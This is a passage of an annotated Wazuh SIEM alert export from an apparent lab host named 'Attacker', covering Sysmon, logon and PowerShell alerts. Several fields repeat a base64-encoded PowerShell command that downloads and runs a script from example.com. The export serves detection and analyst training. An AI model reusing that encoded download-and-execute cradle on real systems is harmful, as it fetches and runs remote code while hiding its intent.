data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:33.853+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:33.853+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  114
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534433.2089726
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:31.3710438Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286009
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:31.361 ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} ProcessId: 16696 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4ssfrd1y.lll.ps1 CreationUtcTime: 2025-04-24 22:40:31.361 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:31.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bddd-680a-d50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16696
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4ssfrd1y.lll.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:31.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:40:35.409+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:35.409+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  58
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534435.2092495
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:32.6880136Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43881
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:36.655+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:36.655+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  111
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534436.2099830
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:34.0647314Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286041
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:32.540 ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} ProcessId: 2532 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} ParentProcessId: 16696 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:32.540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bde0-680a-d80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bddd-680a-d50b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16696
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:36.670+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:36.670+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  115
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534436.2107897
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:34.2997910Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286042
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:34.252 ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} ProcessId: 2532 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_twhlr5xs.n4e.ps1 CreationUtcTime: 2025-04-24 22:40:34.252 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:34.252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bde0-680a-d80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_twhlr5xs.n4e.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:34.252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:40:37.530+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:37.530+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
